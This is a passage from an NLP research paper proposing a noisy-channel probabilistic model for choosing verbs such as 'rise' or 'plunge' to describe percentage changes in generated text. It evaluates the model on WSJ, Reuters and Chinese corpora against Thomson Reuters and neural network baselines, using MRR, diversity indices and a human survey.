(like adjectives and adverbs), or even textual templates as used by Angeli et al. (2010), to describe numerical data. Due to its probabilistic nature, our 512 proposed model could be plugged into, or interpo- lated with, a bigger end-to-end probabilistic model (Konstas and Lapata, 2013) relatively easily, but it is not obvious how this model could fit into a neural architecture (Mei et al., 2016). The existing work on lexicalization that is most similar to ours is a corpus based method for verb se- lection developed by Smiley et al. (2016) at Thomson Reuters. They analyze the usage patterns of verbs expressing percentage changes in a very large corpus, the Reuters News Archive. For each verb, they cal- culate the interquartile range (IQR) of its associated percentage changes in the corpus. Given a new per- centage change, their method randomly selects a verb from those verbs whose IQRs cover the percentage in question, with equal probabilities. A crowdsourcing based evaluation has demonstrated the superiority of their verb selection method to the random baseline that just chooses verbs completely randomly. It is notable that their method has been incorporated into Thomson Reuters EikonTM, their commercial data- to-text NLG software product for macro-economic indicators and mergers-and-acquisitions deals (Pla- chouras et al., 2016). We will make experimental comparisons between our proposed approach and theirs in Section 5. 3 Data 3.1 The WSJ Corpus The first (and main) dataset that we have used to investigate the problem of verb selection is BLLIP 1987-89 Wall Street Journal (WSJ) Corpus Release 1 which contains a three-year Wall Street Journal (WSJ) collection of 98,732 stories from ACL/DCI (LDC93T1), approximately 30 million words (Char- niak et al., 2000). We first utilized the Stanford CoreNLP1 (Manning et al., 2014) toolkit to extract “relation triples” from all the documents in the dataset, via its open-domain information extraction (OpenIE) functionality. Then, with the help of part-of-speech (POS) tagging pro- vided by the Python package NLTK2 (Bird et al., 2009), we filtered the extracted relation triples and retained only those expressing a percentage change 1https://stanfordnlp.github.io/CoreNLP/ 2http://www.nltk.org/ in the following format: Google’s revenue︸︷︷︸ subject rose︸︷︷︸ verb 22.2%︸︷︷︸ percentage . Here the numerical value of percentage change could be written using either the symbol % or the word percent. Note that all auxiliary verbs (including modal verbs) would have been removed, and lemma- tization (Manning et al., 2008; Jurafsky and Martin, 2009) would have been applied to all main verbs so that the different inflectional forms of the same verb would be reduced to their common base form. After extracting 57,005 candidate triples for a to- tal of 1,355 verbs, we eliminated rare verbs which occur less than 50 times in the dataset. Furthermore, we manually annotated the direction of each verb as upward or downward, and discarded the verbs like yield which do not indicate the direction of per- centage change. The above preprocessing left us with 25 (normalized) verbs of which 11 are upward and 14 are downward. There are 21,766 verb-percentage pairs in total. Furthermore, it is found that most of the per- centage changes in this dataset reside within the range [0%, 100%]. Only a tiny portion of percentage changes are beyond that range: 1.35% for upward verbs and 0.10% for downward verbs. Those out-of- range percentage changes are considered outliers and are excluded from our study in this paper, though the way to relax this constraint will be discussed later in Section 6. 3.2 The Reuters Corpus We have also validated our model in a widely-used public dataset, the Reuters-21578 text categorization collection3. It is a collection of 21,578 documents that appeared on Reuters newswire in 1987. The doc- uments were assembled and indexed with categories, but they were not needed in this paper. The same preprocessing as on the WSJ corpus has been applied to this dataset, except that the minimum occurring frequency of verbs was not 50 but 5 times due to the smaller size of this dataset. After manual annotation and filtering, we ended up with 8 verbs in- cluding 4 upward ones and 4 downward ones. There are 603 verb-percentage pairs in total. 3https://goo.gl/NrOfu 513 3.3 The Chinese Corpus Furthermore, to verify the effectiveness of our ap- proach in other languages, we have also made use of the Chinese Gigaword (5th edition) dataset. It is a comprehensive archive of newswire text data that has been acquired from eight distinct sources of Chinese newswire by LDC over a number of years (LDC2011T13), and contains more than 10 million sentences. Since we could not find any open-domain infor- mation extraction toolkit for “relation triples” in Chi- nese, we resorted to regular expression matching to extract, from Chinese sentences, the expressions of percentage together with their local contexts. A num- ber of regular expression patterns have been utilized to ensure that they could cover all the different ways to write a percentage in Chinese. Then, after POS tagging, we would be able to identify the verb imme- diately preceding each percentage if it is associated with one. For our application, a big difference between Chi- nese and English is that the available choices of verbs to express upward or downward percentage changes are pretty limited in Chinese: the variation in fact mostly comes from the adverb used together with the verb. Therefore, when we talk about the prob- lem of Chinese verb selection in this paper, we ac- tually mean the choice of not just verbs but instead adverb+verb combinations, e.g., 狂升 (rise crazily) and 略降 (fall slightly). Our proposed probabilistic model for verb selection, described below in Sec- tion 4, can be extended straightforwardly to such generalized Chinese “verbs”. Similar to the preprocessing of other datasets, rarely occurring verbs with frequency less than 50 would have been filtered out. In the end, we got 18 Chinese verbs of which 14 are upward and 4 are downward. There are 2,829 verb-percentage pairs in total. 4 Approach In this section, we propose to formulate the task of verb selection for data-to-text NLG (see Section 1) as a supervised learning problem (Hastie et al., 2009) and to address it using Shannon’s noisy-channel model (Shannon, 1948). For each of the two possible change directions (upward and downward), we need to build a specific model. Without loss of generality, in the subsequent discussion, we focus on selecting the verbs of one particular direction; the way to deal with the other direction is exactly the same. Thus a percentage change is fully specified by its magnitude in one model. The set-up of our supervised learning problem is as follows. Suppose that we have a set of training ex- amples D = {(x1,w1), . . . , (xN,wN )}, where each example consists of a percentage change xi paired with the verb wi used by the human author to express that percentage change. Such training data could be obtained from a large corpus as described in Sec- tion 3. Let X denote the set of possible percentage changes: as mentioned earlier, in this paper we as- sume that X = [0%, 100%]. Let V denote the set of possible verbs, i.e., the vocabulary. Our task is to learn a predictive function f : X →V that can map any given percentage change x to an appropriate verb w = f(x). Apparently, there is inherent uncertainty in the above described process of predicting the choice of verbs for a percentage change. Making use of probabilistic reasoning, the principled approach to handling uncertainties, we argue that the function f should be determined by the posterior probability P(w|x). However, it looks difficult to directly es- timate the parameters of such a conditional model, aka discriminative model, for every possible value of x which is a continuous variable. Hence, we turn to the easier alternative way often used in machine learning: to construct a generative model. Rather than directly estimating the conditional probability distribution, we instead estimate the joint probability P(x,w) over (x,w) pairs in the generative model. The joint probability can be decomposed as follows: P(x,w) = P(w)︸︷︷︸ prior P(x|w)︸︷︷︸ likelihood , (1) where P(w) is the prior probability distribution over verbs w, and P(x|w) is the likelihood, i.e., the prob- ability of seeing the percentage change x given that the associated verb is w. The benefit of making the above decomposition is that the parameters of P(w) and P(x|w) can be estimated separately. Given such a generative model, we can then use the Bayes rule to derive the posterior probability P(w|x) 514 for any new example of x: P(w|x) = P(w)P(x|w) P(x) , (2) where P(x) = ∑ w∈V P(x,w) = ∑ w∈V P(w)P(x|w) (3) is the model evidence acting as the normalizing con- stant in the formula. Intuitively, this generative model could be consid- ered as a noisy-channel (Shannon, 1948). When we see a percentage change x, we can imagine that it has been generated in two steps (Raviv, 1967). First, a verb w would be chosen with the prior probability P(w). Second, the verb w would be passed through a communication “channel” and be corrupted by the “noise” to produce the percentage change x according to the likelihood function (aka the channel model) P(x|w). In other words, the percentage change x that we see is actually the distorted form of its associated verb w. An alternative, but equivalent, interpretation is that when a pair (x,w) is passed through the noisy- channel, the verb w will be lost and finally only the percentage change x will be seen. The task is to recover the lost w based on the observed x. Shannon’s noisy-channel model is in fact a kind of Bayesian inference. It has been applied to many NLP tasks such as text categorization, spell checking, question answering, speech recognition, and machine translation (Jurafsky and Martin, 2009). Our appli- cation — probabilistic verb selection — is different from them because the observed data are continu- ous real-valued numbers but not discrete symbols. More importantly, in most of those applications such as text categorization using the Naı̈ve Bayes algo- rithm (Manning et al., 2008), the objective is “decod- ing”, i.e., to find the single most likely label w∗ for any given input x from the model w∗ = arg max w∈V P(w|x) = arg max w∈V P(w)P(x|w)/P(x) = arg max w∈V P(w)P(x|w) , (4) and therefore the normalizing constant P(x) does not need to be calculated. However, this is actually undesirable for the task of verb selection, because it implies that the a percentage change x would always be expressed by the same “optimal” verb w∗ corre- sponding to it. To achieve variation and naturalness, we must maintain the diversity of word usage. So the right method to generate a verb w for the given percentage change x is to compute the posterior prob- ability distribution P(w|x) over all the possible verbs in the vocabulary V using Eq. (2) and then randomly sample a verb from that distribution. Although this means that the normalizing constant P(x) needs to be calculated each time, the computation is still effi- cient, as unlike in many other applications the vocab- ulary size |V| is a quite small number in practice (see Section 3). In the following two subsections, we study the two components of our proposed probabilistic model for verb selection, the prior probability distribution and the likelihood function, respectively. 4.1 Prior The prior probability distribution P(w) could sim- ply be obtained by maximum likelihood estimation (MLE): P(w)MLE = Nw/N , (5) where Nw is the number of training examples with the verb w, and N is the total number of training examples. The relationship between a verb’s rank and fre- quency in the WSJ corpus is depicted by the log-log plot Fig. 1, revealing that the empirical distribution of verbs follows the Zipf ’s law (Powers, 1998), which is related to the power law (Adamic, 2000; Newman, 2005). Specifically, the frequency of the i-th popular verb, fi, is proportional to 1/is, where s is the ex- ponent characterizing the distribution (shown as the slope of the straight line in the corresponding log-log plot). This implies that in the context of expressing percentage changes, the human choice of verbs is dominated by a few frequently used ones, and many other verbs are only used very occasionally. Smoothing: If we would like to intentionally boost the diversity of verb choices, we could mitigate the high skewness of the empirical distribution of verbs by smoothing (Zhai and Lafferty, 2004). A simple smoothing technique suitable for this purpose is the Jelinek-Mercer smoothing (Jelinek and Mercer, 1980) 515 0.0 0.5 1.0 1.5 2.0 2.5 log(rank) 4 5 6 7 8 9 lo g( fre q) (a) upward verbs 0.0 0.5 1.0 1.5 2.0 2.5 log(rank) 4 5 6 7 8 9 lo g( fre q) (b) downward verbs Figure 1: The empirical distribution of verbs P(w)MLE follows the Zipf’s law, in the WSJ corpus. which uses a linear interpolation between the maxi- mum likelihood estimation of a verb w’s prior proba- bility distribution with the uniform distribution over the vocabulary of verbs V, i.e., P(w) = λP(w)MLE + (1 −λ) 1|V| , (6) where P(w)MLE is given by Eq. (5), and the parame- ter λ ∈ [0, 1] provides a means to explicitly control the trade-off between accuracy and diversity. The smaller the parameter λ is, the more diverse the gen- erated verbs would be. When λ = 0, the prior prob- ability is completely ignored and the selection of a verb solely depends on how compatible the verb is with the given percentage change. When λ = 1, it backs off to the original model without smoothing. The optimal value of the parameter λ could be tuned on a development set (see Section 5.3). 4.2 Likelihood For each verb w ∈V, we analyze the distribution of its associated percentage changes and calculate the following descriptive statistics: mean, standard devi- ation (std), skewness, kurtosis, median, and interquar- tile range (IQR). All those descriptive statistics for the WSJ corpus are given in Table 1. In addition, Fig. 2 shows the box plots of percentage changes for top-10 (most frequent) verbs in the WSJ corpus, where the rectangular box corresponding to each verb represents the span from the first quartile to the third quartile, i.e., the interquartile range (IQR), with the segment inside the box indicating the median and the whiskers outside the box indicating the rest of the distribution (except for the points that are determined to be “outliers” using the so-called Tukey box plot method). It can be seen that the choice of verbs often im- ply the magnitude of percentage change: some verbs (such as soar and plunge) are mostly used to ex- press big changes (large medians), while some verbs (such as advance and ease) are mostly used to express small changes (small medians). Generally speaking, the former is associated with a relatively wide range of percentage changes (large IQRs) while the latter is associated with a relatively narrow range of percentage changes (small IQRs). Moreover, it is interesting to see that for almost all the verbs, the distribution of percentage changes is heavily skewed to the left side (i.e., smaller changes). Given a new percentage change x, in order to cal- culate its probability of being generated from a verb w in the above described generative model, we need to fit the likelihood function, i.e., the probability dis- tribution P(x|w), for each word w ∈ V, based on the training data. One common technique for this purpose is kernel density estimation (KDE) (Hastie et al., 2009), a non- parametric way to estimate the probability density function as follows: P(x|w) = 1 Nwh Nw∑ i=1 K ( x−xi h ) , (7) 516 verbs mean std skewness kurtosis median IQR upward rise 16.93 18.58 1.77 2.80 9.40 [04.90, 22.00] increase 17.05 18.06 1.76 3.01 10.45 [05.00, 23.00] grow 15.46 17.48 1.77 2.93 8.40 [03.20, 21.00] climb 17.22 18.32 1.81 3.26 10.00 [05.57, 23.00] jump 31.28 23.64 0.77 -0.24 24.20 [12.53, 48.00] surge 29.03 25.43 0.85 -0.33 21.00 [08.00, 46.00] gain 13.78 16.79 1.95 3.89 7.50 [02.00, 20.00] soar 39.39 27.68 0.42 -0.94 35.00 [15.20, 58.00] raise 16.54 15.54 1.83 4.19 11.40 [05.00, 22.75] advance 15.83 15.47 1.87 3.49 10.55 [06.03, 20.00] boost 20.15 16.16 1.68 2.80 16.00 [09.78, 24.99] downward fall 17.52 19.93 1.61 1.86 8.90 [04.18, 24.00] decline 14.81 17.09 1.87 3.07 8.00 [04.58, 19.00] drop 18.36 19.00 1.51 1.72 10.00 [05.47, 26.00] slip 11.95 17.51 2.09 3.24 6.00 [02.00, 09.12] plunge 38.87 26.92 0.48 -0.83 34.05 [15.08, 58.00] slide 23.09 22.29 1.00 -0.03 15.00 [05.25, 38.65] lose 23.65 21.65 1.05 0.47 17.00 [06.00, 36.98] tumble 28.84 22.46 0.98 0.42 24.90 [10.00, 39.20] plummet 36.43 23.89 0.62 -0.35 31.00 [19.90, 50.00] ease 11.02 17.27 2.25 3.97 5.50 [01.95, 08.67] decrease 19.72 18.67 1.25 0.82 12.00 [05.60, 30.80] reduce 25.72 21.81 1.41 1.21 20.00 [10.00, 30.00] dip 13.98 18.98 2.01 2.91 6.85 [03.75, 10.25] shrink 23.82 20.72 1.33 1.37 15.00 [10.00, 35.00] Table 1: The descriptive statistics of percentage changes (in %) for each verb, in the WSJ corpus. 0 20 40 60 80 100 percent rise increase climb grow gain jump soar surge raise advance ve rb (a) upward verbs 0 20 40 60 80 100 percent fall decline drop tumble slip lose plunge ease slide plummet ve rb (b) downward verbs Figure 2: The box plots of percentage changes (in %) for the top-10 verbs, in the WSJ corpus. where Nw is the number of training examples with the verb w, K(·) is the kernel (a non-negative func- tion that integrates to one and has mean zero), and h > 0 is a smoothing parameter called the bandwidth. Fig. 3 shows the likelihood function P(x|w) fitted by KDE with Gaussian kernels and automatic band- width determination using the rule of Scott (2015), for the most popular upward and downward verbs in the WSJ corpus: rise and fall. It is also possible to fit a parametric model of P(x|w) which would be more efficient than KDE. Since in this paper x is assumed to be a continuous random variable within the range [0%, 100%] (see Section 3), we choose to fit P(x|w) with the Beta 517 0 20 40 60 80 100 0.00 0.02 0.04 0.06 0.08 (a) the verb rise 0 20 40 60 80 100 0.00 0.02 0.04 0.06 0.08 (b) the verb fall Figure 3: The likelihood function P(x|w) fitted by kernel density estimation (KDE). 0 20 40 60 80 100 0.00 0.02 0.04 0.06 0.08 (a) the verb rise 0 20 40 60 80 100 0.00 0.02 0.04 0.06 0.08 (b) the verb fall Figure 4: The likelihood function P(x|w) fitted by the Beta distribution. distribution which is a continuous distribution sup- ported on the bounded interval [0, 1]: P(x|w) = Beta(α,β) = Γ(α + β) Γ(α)Γ(β) xα−1(1 −x)β−1 . (8) Although there exist a number of continuous dis- tributions supported on the bounded interval such as the truncated normal distribution, the Beta dis- tribution is picked here as it has the ability to take a great variety of different shapes using only two parameters α and β. These two parameters can be es- timated using the method of moments, or maximum likelihood. For example, using the former, we have α̂ = x̄ ( x̄(1−x̄) v̄ − 1 ) and β̂ = (1−x̄) ( x̄(1−x̄) v̄ − 1 ) if v̄ < x̄(1 − x̄), where x̄ and v̄ are the sample mean and sample variance respectively. Fig. 4 shows the likelihood function P(x|w) fitted by the Beta dis- tribution using SciPy4 for the most popular upward and downward verbs in the WSJ corpus: rise and fall. 5 Experiments 5.1 Baselines Thomson Reuters: The only published approach that we are aware of to this specific task of verb selec- tion in the context of data-to-text NLG is the method adopted by Thomson Reuters EikonTM (Smiley et al., 2016). This baseline method’s effectiveness has been verified through crowdsourcing, as we have mentioned before (see Section 2). Furthermore, it is fairly new (published in 2016), therefore should 4https://www.scipy.org/ 518 represent the state of the art in this field. Note that their model was not taken off-the-shelf but re-trained on our datasets to ensure a fair comparison with our approach. Neural Network: Another baseline method that we have tried is a feed-forward artificial neural net- work with hidden layers, aka, a multi-layer percep- tron (Russell and Norvig, 2009; Goodfellow et al., 2016). It is because neural networks are well-known universal function approximators, and they represent quite a different family of supervised learning algo- rithms. Unlike our proposed probabilistic approach which is essentially a generative model, the neural network used in our experiments is a discrimina- tive model which takes the percentage change in- put (represented as a single floating-point number) and then predicts the verb choice directly. Since we would like to have probability estimates for each verb, the softmax function was used for the output layer of neurons, and the network was trained via back-propagation to minimize the cross-entropy loss function. An l2 regularization term was also added to the loss function that would shrink model param- eters to prevent overfitting. The activation function was set to the rectified linear unit (ReLU) (Hahn- loser et al., 2000). The Adam optimization algo- rithm (Kingma and Ba, 2014) was employed as the solver, with the samples shuffled after each iteration. The initial learning rate was set to 0.001, and the maximum number of iterations (epochs) was set to 1500. For our datasets, a single hidden layer of 100 neurons would be sufficient and adding more neu- rons or layers could not help. This was found using the development set through a line search from 20 to 500 hidden neurons with step size 20. Note that when applying the trained neural network to select verbs, we should use not argmax but sampling from the predicted probability distribution (given by the softmax function), in the same way as we do in our proposed probabilistic model (see Section 4). 5.2 Code The Python code for our experiments, along with the datasets of verb-percentage pairs extracted from those three corpora (see Section 3), have been made available to the research community5. 5https://goo.gl/gkj8Fa 5.3 Automatic Evaluation The end users’ perception of a verb selection algo- rithm’s quality depends on not only how accurately the chosen verbs reflect the corresponding percent- age changes but also how diverse the chosen verbs are, which are two largely orthogonal dimensions for evaluation. Accuracy: The easiest way to assess the accuracy of an NLG method or system is to compare the texts generated by computers and the texts written by hu- mans for the same input data (Mellish and Dale, 1998; Reiter and Belz, 2009), using an automatic metric such as BLEU (Papineni et al., 2002). For our task of verb selection, we decide to use the metric MRR that stands for mean reciprocal rank (Voorhees, 1999; Radev et al., 2002) and can be calculated as follows: MRR = 1 |Q| ∑ (x′i,w ′ i)∈Q 1 rank(w′i) , (9) where Q = {(x′1,w′1), . . . , (x′M,w′M )} is the set of test examples, and rank(w′i) refers to the rank po- sition of w′i — the verb really used by the human author to describe the percentage change x′i — in the list of predicted verbs ranked in the descending order of their probabilities of correctness given by the model. The MRR metric is most widely used for the evaluation of automatic question answering which is similar to automatic verb selection in the following sense: they both aim to output just one suitable response (answer or verb) to any given input (question or percentage change). Through 5-fold cross-validation (Hastie et al., 2009), we have got the MRR scores of our proposed model (see Section 4) and the two baseline mod- els (see Section 5.1) which are shown in Table 2. The models were trained/tested separately on each dataset (see Section 3). In each round of 5-fold cross- validation, 20% of the data would become the test set; in the remaining 80% of the data, randomly selected 60% would be the training set and the other 20% would be the development set if parameter tuning is needed (otherwise the whole 80% would be used for training). The parameter λ of our model controls the strength of smoothing over the prior probability (see Sec- tion 4.1) and thus dictates the trade-off between ac- curacy and diversity. If we focus on the accuracy 519 corpus method upward verbs downward verbs WSJ Thomson Reuters 0.119 ± 0.002 0.106 ± 0.003 Neural Network 0.581 ± 0.044 0.567 ± 0.013 Our Approach (λ = 1 , KDE) 0.724 ± 0.011 0.686 ± 0.016 Our Approach (λ = 1 , Beta) 0.730 ± 0.011 0.685 ± 0.015 Our Approach (λ = 0.05, KDE) 0.533 ± 0.018 0.516 ± 0.003 Our Approach (λ = 0.05, Beta) 0.527 ± 0.012 0.532 ± 0.011 Reuters Thomson Reuters 0.370 ± 0.033 0.339 ± 0.023 Neural Network 0.860 ± 0.050 0.855 ± 0.044 Our Approach (λ = 1 , KDE) 0.887 ± 0.038 0.881 ± 0.036 Our Approach (λ = 1 , Beta) 0.887 ± 0.045 0.872 ± 0.038 Our Approach (λ = 0.05, KDE) 0.729 ± 0.060 0.799 ± 0.036 Our Approach (λ = 0.05, Beta) 0.721 ± 0.070 0.695 ± 0.054 Chinese Thomson Reuters 0.167 ± 0.005 0.345 ± 0.019 Neural Network 0.508 ± 0.057 0.668 ± 0.058 Our Approach (λ = 1 , KDE) 0.525 ± 0.011 0.702 ± 0.047 Our Approach (λ = 1 , Beta) 0.528 ± 0.016 0.696 ± 0.042 Our Approach (λ = 0.05, KDE) 0.433 ± 0.013 0.656 ± 0.040 Our Approach (λ = 0.05, Beta) 0.445 ± 0.012 0.639 ± 0.044 Table 2: The accuracy of verb selection measured by MRR (mean±std) via 5-fold cross-validation. only and ignore the diversity, the optimal value of λ should just be 1 (i.e., no smoothing). In order to strike a healthy balance between accuracy and diver- sity, we carried out a line search for the value of λ from 0 to 1 with step size 0.05 using the development set. It turned out that the smoothing effect upon diver- sity would only become noticeable when λ ≤ 0.1, so we further conducted a line search from 0 to 0.1 with step size 0.01, and found that using λ = 0.05 consis- tently yield a good performance on different corpora. Actually, this phenomenon should not be very sur- prising, given the Zipfian distribution of verbs which is highly skewed (see Fig. 1). Our observation in the experiments still indicate that smoothing with a none-zero λ worked better than setting λ = 0. That is to say, it would not be wise to go to extremes to ignore the prior entirely which would unnecessarily harm the accuracy. An alternative smoothing solution for mitigating the severe skewness of the empirical prior that we also considered is to make the smoothed prior probability proportional to the logarithm of the raw prior probability, but we did not take that route as (i) we could not find a good principled interpreta- tion for such a trick and; (ii) using a small λ value like 0.05 seemed to work sufficiently well. It will be shown later that sampling verbs from the posterior probability distribution rather than just using the one with the maximum probability would help to alleviate the problem of prior skewness and thus prevent verb selection from being dominated by the most popular verbs. It can be observed from the experimental results that smoothing (see Section 4.1) does reduce the accuracy of verb selection. The MRR scores with λ = 0.05 are lower than those with λ = 1. Nev- ertheless, as we shall soon see, strong smoothing is crucially important for achieving a good level of diversity. Furthermore, there seemed to be little per- formance difference between the usage of the KDE technique or the Beta distribution to fit the likelihood function in our approach. This suggests that the latter is preferable because it is as effective as the former but much more efficient. Therefore, in the remaining part of this paper, we shall focus on this specific ver- sion of our model (with λ = 0.05, Beta) even though it may not be the most accurate. The MRR scores achieved by our approach are around 0.4 – 0.8 which implies that, on average, the first or the second verb selected by our approach would be the “correct” verb used by human authors. Across all the three corpora, our proposed proba- bilistic model, whether it is smoothed or not, whether it uses the KDE technique or the Beta distribution, outperforms the Thomson Reuters baseline by a large 520 margin in terms of MRR. According to the Wilcoxon signed-rank test (Wilcoxon, 1945; Kerby, 2014), the performance improvements brought by our approach over the Thomson Reuters baseline are statistically significant with the (two-sided) p-value � 0.0001 on the two English corpora and = 0.0027 on the Chinese corpus. With respect to the Neural Network baseline, on all the three corpora, its accuracy is slightly better than that of our smoothed model (λ = 0.05) though it still could not beat our original unsmoothed model (λ = 1). The major problem with the Neural Net- work baseline is that, similar to the probabilistic model without smoothing, its verb choices would concentrate on the most frequent ones and thus have very poor diversity. A prominent advantage of our proposed probabilistic model, in comparison with discriminative learning algorithms such as the Neural Network baseline, is that we are able to explicitly control the trade-off between accuracy and diversity by adjusting the strength of smoothing. It is worth emphasizing that the accuracy of a verb selection method only reflects its ability to imitate how writers (journalists) use verbs, but this is not necessarily the same as how readers interpret the verbs. Usually the ultimate goal of an NLG sys- tem is to successfully communicate information to readers. Previous research in NLG and psychology suggests that there is wide variation in how different people interpret verbs and words in general, which is probably much larger in the general population than amongst journalists. Specifically, the MRR metric would probably underestimate the effectiveness of a verb selection method, since a verb different from the one really used by the writer is not necessarily a less appropriate choice for the corresponding percentage change from the reader’s perspective. Diversity: Other than the accuracy of reproducing the verb choices made by human authors, verb selec- tion methods could also be automatically evaluated in terms of diversity. Following Kingrani et al. (2015), we borrow the diversity measures from ecology (Magurran, 1988) to quantitatively analyze the diversity of verb choices: each specific verb is considered as a particular species. When measuring the biological diversity of a habitant, it is important to consider not only the number of distinct species present but also the rela- tive abundance of each species. In the literature of ecology, the former is called richness and the latter is called evenness. Here we utilize the well-known Inverse Simpson Index aka Simpson’s Reciprocal In- dex (Simpson, 1949) which takes both richness and evenness into account: D = (∑R i=1 p 2 i )−1 , where R is the total number of distinct species (i.e., rich- ness), and pi is the the proportion of the individuals belonging to the i-th species relative to the entire population. The evenness is given by the value of diversity normalized to the range between 0 and 1, so it can be calculated as D/R. Table 3 shows the diversity scores of verb choices made by our approach and the Thomson Reuters base- line for 450 randomly sampled percentage changes (see Section 5.4). Overall, in terms of diversity, our approach would lose to Thomson Reuters. The Neu- ral Network baseline is omitted here because its di- versity scores were very low. Discussion: Figs. 5 and 6 show the confusion ma- trices of our approach (λ = 0.05, Beta) on the WSJ corpus as (row-normalized) heatmaps: in the former we choose the verb with the highest posterior proba- bility (argmax) while in the latter we sample the verb from the posterior probability distribution (see Sec- tion 4). The argmax way would be dominated by a few verbs (e.g., “rise”, “soar”, “fall”, and “plummet”). In contrast, random sampling would lead to a much wider variety of verbs. The experimental results of all verb selection methods reported in this paper are generated by the sampling strategy, if not indicated otherwise. It can be seen from Fig. 6 that the verbs “soar” and “plunge” are the easiest to be predicted. Generally speaking, the prediction of verbs is rela- tively more accurate for bigger percentage changes, whether upwards or downwards. This is probably be- cause there are fewer verbs available to describe such radical percentage changes (see Fig. 2) and thus the model faces less uncertainty. Most misclassification (confusion) happens when a verb is incorrectly pre- dicted to be the most frequent one (“rise” or “fall”). 5.4 Human Evaluation The two aspects, accuracy and diversity, are both im- portant for the task of verb selection. Although we have shown that automatic evaluation could be car- 521 ris e in cr ea se gr ow cl im b ju m p su rg e ga in so ar ra is e ad va nc e bo os t rise increase grow climb jump surge gain soar raise advance boost 0.0 0.1 0.2 0.3 0.4 0.5 (a) upward verbs fa ll de cl in e dr op sl ip pl un ge sl id e lo se tu m bl e pl um m et ea se de cr ea se re du ce di p sh rin k fall decline drop slip plunge slide lose tumble plummet ease decrease reduce dip shrink 0.00 0.15 0.30 0.45 0.60 (b) downward verbs Figure 5: The confusion matrix heatmap of our approach on the WSJ corpus: choosing the verb with the highest posterior probability. ris e in cr ea se gr ow cl im b ju m p su rg e ga in so ar ra is e ad va nc e bo os t rise increase grow climb jump surge gain soar raise advance boost 0.08 0.10 0.12 0.14 0.16 (a) upward verbs fa ll de cl in e dr op sl ip pl un ge sl id e lo se tu m bl e pl um m et ea se de cr ea se re du ce di p sh rin k fall decline drop slip plunge slide lose tumble plummet ease decrease reduce dip shrink 0.045 0.060 0.075 0.090 0.105 0.120 (b) downward verbs Figure 6: The confusion matrix heatmap of our approach on the WSJ corpus: sampling the verb from the posterior probability distribution. corpus method upward verbs downward verbs richness evenness diversity richness evenness diversity WSJ Our Approach 5 0.6324 3.162 5 0.4698 2.349 Thomson Reuters 11 0.8771 9.648 14 0.6821 9.550 Reuters Our Approach 3 0.7520 2.256 3 0.5933 1.780 Thomson Reuters 4 0.6453 2.581 4 0.5720 2.288 Chinese Our Approach 6 0.7965 4.779 4 0.5265 2.106 Thomson Reuters 14 0.5831 8.164 4 0.7150 2.860 Table 3: The diversity of verb selection measured by the Inverse Simpson Index. 522 corpus verbs Our Approach vs Thomson Reuters Our Approach vs Neural Network > < ≈ p-value > < ≈ p-value WSJ upward 43 32 0 0.2480 53 22 0 0.0004 downward 44 28 3 0.0764 42 32 1 0.2954 both 87 60 3 0.0316 95 54 1 0.0010 Reuters upward 37 28 10 0.3211 43 24 8 0.0271 downward 39 31 5 0.4030 50 23 2 0.0021 both 76 59 15 0.1683 93 47 10 0.0001 Chinese upward 42 30 3 0.1945 65 9 1 � 0.0001 downward 29 37 9 0.3891 37 34 4 0.8126 both 71 67 12 0.7985 102 43 5 � 0.0001 All both 234 186 30 0.0217 290 144 16 � 0.0001 Table 4: The results of human evaluation, where the p-values are given by the sign test (two-sided). ried out for either accuracy or diversity alone, there is no obvious way to assess the overall effectiveness of a verb selection method using machines only. The ultimate judgment on the quality of verb selection would have to come from human assessors (Mellish and Dale, 1998; Reiter and Belz, 2009; Smiley et al., 2016). To manually compare our approach (the version with λ = 0.05, Beta) with a baseline method (Thom- son Reuters or Neural Network), we conduct a ques- tionnaire survey with 450 multiple-choice questions. In each question, a respondent would see a pair of generated sentences describing the same percentage change with the verbs selected by two different meth- ods respectively and need to judge which one sounds better than the other (or it is hard to tell). For exam- ple, a respondent could be shown the following pair of generated sentences: (1) Net profit declines 3% (2) Net profit plummets 3% and then they were supposed to choose one of the three following options as their answer: [a] Sentence (1) sounds better. [b] Sentence (2) sounds better. [c] They are equally good. The respondents would be blinded to whether the first verb or the second verb was provided by our proposed method, as their appearing order would have been randomized in advance. The questionnaire survey system withheld the information about the source of each verb until the answers from all respondents had been collected, and then it would count how many times the verb selected by our proposed method was deemed better than (>), worse than (<), or as good as (≈) the verb selected by the baseline method. For each corpus, we produced 150 different ques- tions, of which half were about upward verbs and half were about downward verbs. As we have explained above, each question compares a pair of generated sentences describing the same percentage change with different verbs. The sentence generation process is the same as that used by Smiley et al. (2016). The subjects were randomly picked from the most popular ones in the corpus (e.g., “gross domestic product”), and the percentage changes (as the objects) were ran- domly sampled from the corpus as well. Each of the two verb selection methods, in comparison, would provide one verb (as the predicate) for describing that specific percentage change. Note that in this sentence generation process, a pair of sentences would be re- tained only if the verbs selected by the two methods were different, as it would be meaningless to compare two identical sentences. A total of 15 college-educated people participated in the questionnaire survey. They are all bilingual, i.e., native or fluent speakers of both English and Chinese. Each person was given 30 questions: 10 questions (including 5 upward and 5 downward ones) from each corpus. We (the authors of this paper) were excluded from participating in the questionnaire survey to avoid any conscious or unconscious bias. The results of human evaluation are shown in Ta- ble 4. Altogether, respondents prefer the verb se- lected by our approach 234/450=52% of times, as opposed to 186/450=41% for the Thomson Reuters baseline; respondents prefer the verb selected by 523 our approach 290/450=64% of times, as opposed to 144/450=32% for the Neural Network baseline. According to the sign test (Wackerly et al., 2007), our approach works significantly better than the two baseline methods, Thomson Reuters and Neural Net- work: overall the (two-sided) p-values are less than 0.05. Discussion: Our approach exhibits more superior- ity over the Thomson Reuters baseline on the English datasets than on the Chinese dataset. Since the Chi- nese dataset is bigger than the Reuters dataset, though smaller than the WSJ dataset, the performance differ- ence is not caused by corpus size but due to language characteristics. Remember that for Chinese we are actually predicting adverb+verb combinations (see Section 3.3). Retrospective manual inspection of the experimental results suggests that users seem to have relatively higher expectations of diversity for Chinese adverbs than for English verbs. 6 Extensions Robustness: It is still possible, though very un- likely, for the proposed probabilistic model to gen- erate atypical uses of a verb. A simple measure to avoid such situations is to reject the sampled verb w∗ if the posterior probability P(w∗|x) < τ where τ is a predefined threshold, e.g., 5%, and then resample w∗ until P(w∗|x) ≥ τ. Unlimited Range: If the magnitude of a percent- age change is allowed to go beyond 100%, we would no longer be able to use the Beta distribution to fit the likelihood function P(x|w) as it is supported on a bounded interval. However, it should be straight- forward to use a flexible probability distribution sup- ported on the semi-infinite interval [0, +∞], such as the Gamma distribution. Subject: The context, in particular the subject of the percentage change, has not been taken into ac- count by the presented models. As illustrated by the two example sentences below, the same verb (“surge”) could be used for quite different percentage changes (“181%” vs “8%”) depending on the subject 